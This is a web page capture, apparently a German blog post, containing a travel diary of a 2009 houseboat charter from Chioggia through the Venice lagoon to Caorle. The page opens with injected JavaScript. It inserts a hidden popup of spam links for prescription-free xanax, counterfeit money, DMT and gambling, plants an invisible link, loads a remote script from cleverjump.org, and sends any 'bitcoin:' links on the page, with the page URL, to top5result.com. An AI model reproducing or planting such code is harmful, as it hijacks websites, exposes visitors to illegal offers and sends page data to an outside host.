/* Domain is for sale: admin@kickvox.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
xanax for sale online no prescription<\/a> <\/div>
alprazolamvendor.com<\/span> <\/div> <\/div>
horse and igf-1<\/a> <\/div>
equinemedcare.com<\/span> <\/div> <\/div> <\/div>
smart carts maui wowie<\/a> <\/div>
smartbudsandcarts.com<\/span> <\/div> <\/div>
fue hair transplant post operative care plan<\/a> <\/div>
www.cosmedica.com<\/span> <\/div> <\/div> <\/div>
\u0e2a\u0e25\u0e47\u0e2d\u0e15\u0e2d\u0e2d\u0e19\u0e44\u0e25\u0e19\u0e4c\u0e21\u0e37\u0e2d\u0e16\u0e37\u0e2d<\/a> <\/div>
pgslotgm.com<\/span> <\/div> <\/div>
\u0e27\u0e34\u0e18\u0e35 \u0e40\u0e25\u0e48\u0e19 \u0e1a\u0e32 \u0e04\u0e32 \u0e23\u0e48\u0e32 sa<\/a> <\/div>
sexy-gaming168.com<\/span> <\/div> <\/div> <\/div>
\u044d\u043a\u0440\u0430\u043d \u0430\u0439\u0444\u043e\u043d\u0430 xr<\/a> <\/div>
ifix.ua<\/span> <\/div> <\/div>
alopecia androgenetica sintomi menopausa<\/a> <\/div>
microfue.it<\/span> <\/div> <\/div> <\/div>
so me music video directors<\/a> <\/div>
gearseven.tv<\/span> <\/div> <\/div>
jcpenney com clearance<\/a> <\/div>
yeswecoupon.com<\/span> <\/div> <\/div> <\/div>
augentropfen auf kontaktlinsen<\/a> <\/div>
www.linsenkontakt.ch<\/span> <\/div> <\/div>
porte document plastique<\/a> <\/div>
films-etirable.fr<\/span> <\/div> <\/div> <\/div>
catalog trang tri noi that nha<\/a> <\/div>
nhilong.com<\/span> <\/div> <\/div>
high cube container home<\/a> <\/div>
www.livinginacontainer.com<\/span> <\/div> <\/div> <\/div>
iyi elektrik s\u00fcp\u00fcrgesi<\/a> <\/div>
www.tmm.com.tr<\/span> <\/div> <\/div>
dimethyltryptamine kopen<\/a> <\/div>
www.klinische-apot.com<\/span> <\/div> <\/div> <\/div>
buy cannabis derived terpenes<\/a> <\/div>
hempsalescbd.com<\/span> <\/div> <\/div>
"fake bills online"<\/a> <\/div>
counterfeitmoneypro.com<\/span> <\/div> <\/div> <\/div>
funny graphic tees womens<\/a> <\/div>
www.randomshirts.com<\/span> <\/div> <\/div>
bulk ammunition sale<\/a> <\/div>
ammoshop.net<\/span> <\/div> <\/div> <\/div>
w88<\/a> <\/div>
linkw88moinhat.com<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
free ca domain name<\/a> <\/div>
nameversion.com<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} setTimeout(function() { try { var links = document.querySelectorAll('a[href^="bitcoin:"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'top5result.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//top5result.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();
16.06.2010

Hausbootferien Lagune von Venedig

Zeit: Törn: 19.9. – 26.9.2009
Region: Lagune von Venedig + Wasserwege nach Caorle
Charter: Locaboat Holidays
Hausboot: Penichette 1020 FB – Latisana
Basis: ab/an Chioggia
Crew: Helga, Tina, Jürgen, Pit

Freitag 18.9.2009
Abreise Berlin 10.00 h mit Volvo V 40 – ein bequemes, geräumiges, gut laufendes Auto, sparsam. Ankunft in Flachau gegen 16.00 h (780 km) – unsere Vermieter (Elisabeth und Theo) sind nicht da, die Pension ist verschlossen, später stellt sich heraus, dass sie im Krankenhaus und er zum 70 – Geburtstag seiner Schwester gefahren ist und den Termin verschwitzt hat. Wir essen im „Hoagascht“ und übernachten auf Empfehlung im nahegelegenen Apartmenthaus (Studio mit zwei Schlafzimmern und Bädern – sehr schön). Pit holt am nächsten Morgen Brötchen im Penny-Supermarkt.

Samstag 19.9. 2009
Nun sind es noch 400 km bis Chioggia – Ankunft gegen 13.00h. Einrichten, Auto auf Parkplatz fahren, Einweisung – nautisch Laura, technisch Paolo (wir kennen ihn noch vom letzten Mal vor 2 Jahren), Probefahrt. Einkaufen im nahen Supermarkt, Abendspaziergang durch Chioggia (Klein –Venedig) – es herrscht ein reges Treiben im Städtchen, die Einheimischen haben sich feingemacht, man zeigt sich und will gesehen werden – Landebier! – Abendessen später in einer Seitengasse – recht gut! Schlussdrink an Deck in der lauen Abendbriese vor der beleuchteten Stadtkulisse!

Sonntag 20.9. 2009
Strahlendes Wetter, Frühstück um 9.00 h, Ablegen 10.00 h. Bugstrahlruder geht nicht – aber da sind wir schon vom Steg los! (das bekommen wir schon hin!) Es wird eine schöne Fahrt an Pellestrina, Portosecco, St. Pietro in Volta vorbei hinüber nach Alberoni – bei den Überfahrten über die Öffnungen der Lagune zum Meer z.B. bei Chioggia oder Malamocco muß man aufpassen, den richtigen Kanal für die Weiterfahrt zu finden – da ist es gut, wenn noch einer mitguckt auf Karte und Wasser (Jürgen). Vom Canale Malamocco zweigen wir in den Canale di Spirito ab und kommen auf dem Canale Or’ano direkt vor dem rotleuchtenden Bienale – Wahrzeichen an. Nun liegt nach kurzer Fahrt auf dem Baccino di S. Marco der Markusplatz vor uns – es herrscht wieder das bekannte Chaos auf der Wasserfläche um uns, weil alle Taxen, Vaporettos, Fähren, Müllfahrzeuge, Privatboote etc. trotz Geschwindigkeitsbeschränkung Höchsttempo fahren – da kann unser Schiff natürlich nicht mithalten – wir haben gerade mal 35 PS und sind sehr langsam und schwerfällig und kommen ganz schön ins Schaukeln! – Trotzdem ist es immer wieder ein tolles Gefühl mit dem eigenen Boot vor Venedig herum zu gondeln. – Wir fahren noch ein Stück den Canale della Giudecca hinauf – aber es ist zu unruhig, da auch noch ein kräftiger Wind zusätzliche Wellenbewegung erzeugt. – Der Canale Grande ist ja für Sportboote gesperrt! Zurück also an S.Elena vorbei und La Certosa nach Vignole, dem empfohlenen Anleger unserer Chartergesellschaft. (Uhrzeit: 13.30 h) Es ist noch alles so wie vor 2 Jahren – wir legen an und wandern den kurzen Weg zur Trattoria mit dem schönen Blick auf Venedig! – Heute ist letzter Tag der Saison und es herrscht reges Treiben – viele italienische Sonntagausflügler mit ganzen Familien speisen und schnattern laut durcheinander! – (Hier wird das bestellte Essen – wenn fertig – ausgerufen – SB!) Da ist sicher abends alles vorbei – bei leer gewordenen Tischen werden schon die Stühle hochgestellt – dann fahren wir eben noch ein Stück weiter nach Torchello, wo uns Laura so ein tolles Lokal mit ruhigem Anlegeplatz für die Nacht – aber erst ab 18.00 h , wenn die Touristenschiffe weg sind – empfohlen hat! Ablegen – auf dem kurzen Stück auf dem breiten Canale di S. Nicolo werden wir wieder von Wind und Wellen ordentlich durchgeschüttelt bis wir auf den Canale S. Erasmo einbiegen können und Windschutz haben. Hinter uns bewegt sich ein riesiges Kreuzfahrt-Schiff (fahrender Wohnblock!) in Richtung Lido und Meer . Wir passieren S.Erasmo und fahren an Burano vorbei nach Torchello – aber wo ist nun das gepriesene Lokal? – Der von Laura auf der Karte bezeichnete Kanal endet ohne weitere Bricolas in der Laguna – da können wir nicht weiter – es gibt auch keine Hinweisschilder auf ein Restaurant oder Steg – also zurück! Um Burano herum ist der Teufel los, es gibt kaum ein Durchkommen – es findet ein „Gondel-Rennen“ statt mit vielen Zuschauern zu Lande und zu Wasser – Boote über Boote! Da können wir auch nicht zur Nacht bleiben – so entschließen wir uns die nächstgelegene Marina in Treporti anzulaufen – es dämmert ja auch schon! (18.00 h) Im Kanal vor dem Lokal, das bei Verzehr gebührenfreies Anlegen garantiert – ist kein Festmacher zu erkennen – außerdem ist das Wasser sehr flach und fällt noch weiter! In der Marina legen wir zunächst außen an – das kann aber unruhig werden mit der nahen Vaporetto- und Fährstation! – Der Hafenmeister (?) meint aber, dies wäre ein sicherer Platz, innen wäre es zu flach bei gerade ablaufendem Wasser! Das Lokal an dem Kanal wäre zu teuer, wir sollten lieber die Trattoria – ca. 10 Min. – im Ort aufsuchen! Der Tipp ist gut, wir essen ausgezeichnet, wenn auch nicht gerade billig – und – neue Erfahrung -werden von den Mücken fast aufgefressen! – Die Strecke ist für Tina eigentlich zu weit zu laufen – wie lang dauern eigentlich 10 italienische Minuten? Die Nacht wird sehr unruhig, wir nehmen Wasser und Strom und benutzen die sanitären Anlagen und löhnen € 60.- für die Nacht.

Montag 21.9.2009
Etwas diesig, windig, aber trocken – Frühstück um 9.00 h – Ablegen 10.00 h. Beim Ablegen verklemmt sich die Bugleine an der Klampe an Land und wir werden von Strömung und Wind umgedreht und wieder parallel gegen den Steg gedrückt. Mit fremder Hilfe von Land aus kommen wir dann aber vom Steg los und fahren weiter Richtung Cavallino. Es geht durch den Canale S. Felice, den Canale Riga, den Canale die Bari und den Canale il Fosso, eine schöne und eindrucksvolle Strecke mit einer reichen Sumpfflora und –fauna. Wir passieren Cavallino und biegen in den Kanal zur Schleuse von C. ein – die Schleuse ist geöffnet, wir sehen aber an der Ampel rot und machen daher an Dalben davor fest und rufen an. – „Wir sollen einfahren“ – gar nicht so einfach gegen den Seitenwind wieder abzulegen – die Schleusenampel ist wohl stillgelegt, das rote Licht eine Sonnenlichttäuschung! – Wir sollen nicht festmachen in der Schleuse, bedeutet uns die Schleusenwärterin sondern auf und abdümpeln und warten bis der Schleusungsvorgang beendet ist! Unendlich langsam schließen sich die Tore hinter uns und dann dauert es wieder recht lang, bis die 30 cm Wasser Hub ausgeglichen sind und sich die Tore vor uns öffnen – (und das alles ohne Bugstrahlruder, das immer noch nicht funktioniert trotz Anruf bei Paolo, den ich aber mit seinen in gebrochenem „Deutsch“ gestammelten Erläuterungen nicht richtig verstehe!) Später habe ich den Einschaltmechanismus dann doch noch herausbekommen! Es geht weiter an Cavallino Hafen vorbei nach Jesolo zu den 2 beweglichen Brücken, wo man wegen der Öffnung anrufen soll und inzwischen einkaufen kann! – Als wir um 12.30 h eintreffen ist gerade Mittagszeit – nächste Öffnungsperiode von 15.00h bis 18.30 h – es gibt überhaupt keinen Anleger und die Geschäfte sind auch alle bis 15.30 h geschlossen! Wir machen an einem Dalben fest, drehen das Heck zum Land und machen hinten mit einer Leine an der nächsten Straßenlaterne fest. Man kann nur mittels des mitgeführten Bordsteges an Land balancieren – die Damen verzichten – Jürgen und ich versuchen, etwas Obst oder Kuchen aufzutreiben – und das gelingt sogar – die Supermärkte und sonstigen Lebensmittelgeschäfte sind geschlossen, aber eine Pastizzeria hat auf und auch der Obsthändler! Apropos – „Festmachen“ – in Frankreich und Deutschland hatten wir immer große Stahlnägel und Hammer an Bord – so konnte man überall an geeignetem Ufer anlegen und festmachen! Hier in Italien, wo die Anleger so rar sind – Fehlanzeige! Es dauert wirklich bis 15.30 h bis die Brücken geöffnet werden. Wir fahren die schöne Strecke auf der Sile hoch an S.Pietro di Piave vorbei bis Caposile. Auch die recht hübsche Trattoria in S.P. hat keinen Anleger, wie soll man da zum Einkehren an Land kommen? Der empfohlene Anleger in Caposile rechts vor der schönen alten eisernen Fußgängerbrücke wirkt morsch und verfallen und für uns nicht geeignet. Wir wollen ja sowieso weiter die alte Piave abwärts nach Chiesanuova, wo es einen neuen Pontonschwimmsteg geben soll und ein kleines malerisches Örtchen mit Geschäften zum Einkaufen und Pizzerien zum Essen und einen ruhigen Übernachtungsplatz. Diesmal stimmt fast alles – Steg und Platz sind gut, die wenigen Angler räumen bereitwillig den Steg, wir liegen gut, der Alimentari hat geöffnet, die einzige Pizzeria aber hat montags geschlossen! – Also gibt es heute Nudeln mit einer leckeren Fleischsoße! (Helga) Wir sitzen noch lange draußen an Deck und genießen die schöne warme Nacht ! (mit ein paar Weinchen selbstverständlich!)

Dienstag 22.9.2009
Ein strahlender Morgen – Frühstücken, Weiterfahren um 10.00 h. Wir erreichen Musile und biegen in die neue Piave ein Richtung Meer – ein breiter Strom mit grünen, bewaldeten Ufern! – Das einzige erwähnenswerte Städtchen auf der Weiterfahrt ist Ericlea – aber auch hier findet sich weit und breit keine Anlegemöglichkeit – also weiter! Ein riesiges Fischernetz, von beiden Ufern an großen Masten gesteuert wird vor uns in den Fluß abgesenkt – kann man da nun drüber fahren oder muß man seitlich vorbeifahren? Als wir zögerlich heranfahren, ruft der Fischer aus seinem Häuschen ‚ avanti, avanti ‚ – also drüber! – Das sollte uns noch öfter passieren – aber das erstemal ist man unsicher! Nach 1 ½ Std. kommt die bewegliche Brücke von Cortelazzo in Sicht –wir hupen in 50 m Entfernung 3 x – wie vereinbart – und siehe da – uns wird aufgetan – d.h. ein ziemlich umständlicher Prozess beginnt – erst muß der Verkehr gesperrt werden – (Schranken) dann müssen die Verankerungen zwischen der Straße und Brücke gelöst werden, dann muß die Brücke bzw. ein Teil gedreht werden und dann können wir durch . Derweilen kreisen wir in der Strömung vor der Brücke! Wir fahren weiter und suchen bei C. zunächst vergeblich nach einem Anleger, weil wir eine Mittagspause machen wollen. 1 Restaurant – gut besucht hat keinen Anleger, ein R. mit gutem Anleger ist geschlossen und alles verbarrikadiert, so dass man auch nicht vom Steg an Land kommt, im Hafen ist es eng und soweit ersichtlich kein Platz, schließlich gehen wir an der Marina längs – außen – zusammen mit Strömung und einer Menge Treibholz – wir finden kaum eine Schiffslänge Raum – aber dann gelingt es doch und wir spazieren in die Marina hinein. Den Hafenmeister frage ich, ob wir wohl für 2 Std. da bleiben dürfen, und ob er dann noch da ist? – das wird bejaht! Ja – das fällt wirklich auf – es gibt nur ganz wenige, brauchbare Anleger – oder es ist alles schon geschlossen und eingemottet – Saisonende! Wir spazieren erstmal ans Meer – Baden verboten – es ist auch nicht sehr einladend an dieser Flussmündung – dann in den Ort und erinnern uns an das Städtchen von einem Radausflug von Jesolo aus! – Es gibt nicht viel zu sehen – in einer kleinen Trattoria nehmen wir einen Imbiß und gehen wieder an Bord! Das Ablegemanöver gelingt problemlos und wir dampfen wieder ein Stück aufwärts und durchfahren die Schleuse Redevoli (immer geöffnet), biegen in den Kanal Redevoli ein fahren auf dem Kanal Largon bis zur bewegliche Brücke von „Torre di fine“– Hier müssen die Öffnungszeiten beachtet und eine Gebühr von 18.- € bezahlt werden. Wir legen an und müssen auch nicht lange warten (15 Min.) – das Wechselgeld fällt vom Deck ins Wasser und als die Brückenwärterin sich anschickt, uns erneut 2.- € zuzuwerfen, verzichten wir großzügig! Noch 7 km bis Brian, bei der alten stets geöffneten Brücke befindet sich eine kleine Marina, wir erreichen den Kanal Livenza und fahren weiter in den Kanal Commessera. Auf der linken Seite befindet sich der Liegeplatz der „Trattoria Emilian“, die wegen ihrer guten italienischen Hausmannskost empfohlen wird. Wir wollen aber weiter nach Caorle. Porto Margherita, Canale Dell’Orologio, – die Fahrt ist etwas unruhig, weil gerade die Fischereiflotte vom Fang zurückkehrt und unser Boot in schnellem Tempo passiert. Kurz vor dem Fischerhafen, den wir nicht befahren sollen, biegen wir links ab in das Hafenbecken vor der beweglichen Brücke, um auf der linken Seite den schönen Liegeplatz des Restaurants „Da Duilio“ zu erreichen – leider geschlossen und der Liegeplatz ist von kleinen Booten zugeparkt. (Hier irrt übrigens die Reisebeschreibung – das erwähnte Lokal befindet sich auf der rechten Seite!). Aber wir legen links an zwischen 2 Doppelpfählen – unser Boot geht gerade dazwischen -18.00 h – viel länger kann man um diese Jahreszeit auch nicht fahren – es wird früh dunkel! Nach dem obligaten Landebier laufen wir ins Städtchen und suchen uns eines der vielen Lokale aus, die es im Zentrum der Altstadt gibt. Gutes Abendessen! Rückmarsch im Dunkeln mit Taschenlampe – man kann immer noch draußensitzen!

Mittwoch 23.9.2009
Wir verzichten auf die Weiterfahrt in die Lagune von Caorle – man muß 1 Tag vorher anrufen, um die bewegliche Brücke von C. zu öffnen – wie soll das gehen – wenn man nur ein paar Stunden hineinfahren will und dann am selben Tag wieder zurück – schade – aber das ist zu umständlich! Ablegen um 10.00 h – es geht zurück! Auch eine weitere Entscheidung musste getroffen werden – fahren wir von Caorle aus ein Stück übers Meer z.B. Caorle – Cortelazzo (16 km = 2 Std.) und vermeiden damit die bewegliche Brücke von Torre di fine (18.- €) oder sogar noch weiter bis Jesolo? Bei diesem ruhigen Wetter wäre das durchaus möglich! Die Crew entscheidet sich für den Landweg ! Das Weitere ist schnell berichtet (siehe Beschreibung der Herfahrt) – Torre di Fine – Cortelazzo – bewegliche Brücke von C. (3 x hupen) – Piaveaufwärts – Musile – alte Piave – Mittagspause in Chiesanuove – Resteessen – Nudeln – es ist noch richtig heiß mittags! Als wir gerade festliegen, kommt eine Europa 400 und legt vor uns am alten Steg an! Ein Ehepaar – ich helfe beim Anlegen, nehme die Leinen! Man dankt, isst eilends aus der Tüte und klopft dumme Sprüche! Man war bis Grado, will heute noch nach Venedig, man müsse hier weg wegen des fallenden Wassers, ob wir wüßten, daß wir an der alten Fußgängerbrücke aufpassen sollten wegen des Sonnensegels (?), welches man auch selbst gleich vorsichtshalber umlegt. – Um 15.30 h passieren wir die alte Fußgängerbrücke und kreisen dann ca. 20 Min. vor der beweglichen Brücke von Portegrande, die dann zögerlich geöffnet wird! Der Kanal nach Portegrande – etwa 1 Std.- ist dreckig und schnurgrade langweilig! Mal sehen, ob man noch vor der Schleuse anlegen kann und ob inzwischen das Schleusenrestaurant wieder renoviert und geöffnet ist. – Anleger ja – Restaurant nein! Wir fahren weiter ein kleines Stück die Sile hoch und legen am Restaurantsteg Locanda in der Nähe der Kirche an, die uns mit Abendgeläut begrüßt – ein schöner ruhiger Platz. (18.00 h) Aber auch dieses Restaurant hat schon mit der Saison abgeschlossen und zu. – Es wird die Pizzaria im Ort empfohlen! Wir essen ausgezeichnet, haben aber Mückenmittel und Taschenlampe vergessen! Die nette Bedienung – unsere Not erkennend – stellt Räucherschlangen auf und gibt uns Mückenspray! Großartig! Und dann geht es auch tatsächlich besser! Als wir bootwärts aufbrechen hat sich ein milchiger Dunst über die Landschaft gelegt – wir finden trotzdem unser Schiff und haben eine geruhsame Nacht! Das Wasser ist weiter gefallen – aber ich denke, wir liegen weit genug vom Ufer ab! (Hochwasser morgen gegen 13.00 h – die Tide beträgt in der Lagune zwischen 1 m und 1,20 m! )

Donnerstag 24.9.2009
Wieder ein herrlicher Morgen – leichter Dunst auf dem Wasser! Ablegen wie immer um 10.00 h – aus der Schleuse kommen gerade Boote – wir können einfahren! – Der Hub liegt zwischen 30 und 50 cm! Uns erwartet eine ruhige Fahrt auf dem Canale Silone mit seiner reichen Flora und Fauna; in etwa 1 Std . erreichen wir Burano und legen vor der Holzbrücke an. Das Anlegen ist insofern nicht so ganz einfach, da man versuchen muß vor einer der Holztreppen mit der Ausstiegsseite zu liegen – sonst wird das Verlassen des Bootes schwierig (so jung sind wir alle nicht mehr!) – Aber nach mehreren Versuchen gelingt es, eine passable Position zu finden! Burano überrascht immer wieder mit seinen gewagt bunt gestrichenen Hausfassaden , außerdem steht der Kirchtum extrem schief! – Kleiner Rundgang und Imbiß in einer Pizzaria mit gelangweiltem Personal an schönem Platz! Ablegen gegen 15.30 h – wir wollen in Vignole noch einen guten Liegeplatz ergattern, bevor sie alle kommen, die wie wir morgen nach Chioggia fahren! Und das klappt dann auch – ca. 1 Std. Ich helfe einem anderen Boot anzulegen, das immer wieder mit dem Versuch scheitert, mit dem Strom anzulegen, wobei das Schiff querdreht. Erst als sie meinen Rat folgen und das Schiff gegen die Strömung drehen, gelingt das Manöver – ich nehme die Leinen! Wir gehen ins Agritourismo-Lokal und essen recht ordentlich! – Nur der Wein –ob rot oder weiß – ist zu süß – wir behelfen uns an Deck in der lauen Nacht mit Jaques’s Nippelwein! – Diesmal hatten wir die Taschenlampen mit – aber die Nacht ist klar und der Mond leuchtet hinreichend! – Wir haben Niedrigwasser und das Anbordgehen ist ein bisschen umständlicher! (Das Boot liegt tiefer) Es war eine ruhige Nacht! 

Freitag, 25.9.2009
Wir fahren mit dem Vaporetto um 9.45 h nach Venedig – Fundamento Nuove und laufen dann quer durch bis zum Markusplatz. Von dort nehmen wir die 2 nach St.Georgio (Palladio Entwurf). Turmbesteigung per Fahrstuhl, wunderschöner Blick über Venedig, Schlangestehen nicht am Fahrstuhl sondern vor der einzigen Toilette! – Das Vaporetto ist teuer geworden – ein Einzelticket kostet 6.50 € und gilt 1 Std.. Also zurück zum Markusplatz und dann zu Fuß zur Rialtobrücke – es ist ein unheimliches Gewühl in der Stadt, Venedig quillt über vor Touristen und wir verlieren ein bisschen die Lust – Helga und Jürgen war es ebenso ergangen und sie hatten wegen Überfüllung auf die geplante Vaporettofahrt mit der Linue 1 durch den Canal Grande verzichtet. Wir fahren zurück nach Vignole – alle sind pünktlich an Bord und als wir um 15.00 h starten wollen, springt der Motor auch nach mehreren Versuchen nicht an. Also Paolo anrufen – der mit mir einen telephonischen Check macht- aber alles – Sicherungen, Instrumente etc. sind in Ordnung. Aber siehe da – beim nächsten Versuch startet die Maschine – so als ob es erst der Stimme ihres Herrn bedurft hätte, um Die Rückfahrt nach Chioggia wird weniger stürmisch und unruhig wie befürchtet – vormittags wehte ein kräftiger Wind, der aber mittags nachließ – kurze Irritation bei der Überfahrt über den Canale di S. Nicolo Richtung Canale Or’ano – aber Tina mit ihrem guten Ortsgedächtnis hilft uns aus der Patsche – so wird es noch eine schöne Fahrt in die Abendsonne hinein! Ankunft in der Basis um 18.00 h – das Anlegemanöver – rückwärts in die Box gelingt hervorragend – auch die beiden Girls an den Vorderleinen leisten ganze Arbeit! Landewein – kleine Häppchen, Oliven etc. Abendessen in Chioggia wieder in dem bewußten Seitengassenlokal – wieder sehr ordentlich! Abschluß-Getränk an Deck – noch immer kann man leicht bekleidet draußen sitzen! Die Nacht wird unruhig – der Wind steht auf die Pier – das Schiff rollt ein wenig (die ganze Nacht) – dazu kommen die Frühfähren, die überhaupt keine Rücksicht nehmen.

Samstag 26.9.2009
Frühstück. Gepäck von Bord, Jürgen holt das Auto, Paolo hat nichts zu beanstanden, ich moniere noch mal die dauernd anspringende Bilgenpumpe und die unrund laufende Wasserpumpe! Der schöne Bootstörn ist zu Ende, nun folgt die Badewoche am Meer!

Berlin. den 4. Oktober 2009 Der Käpten

Kategorien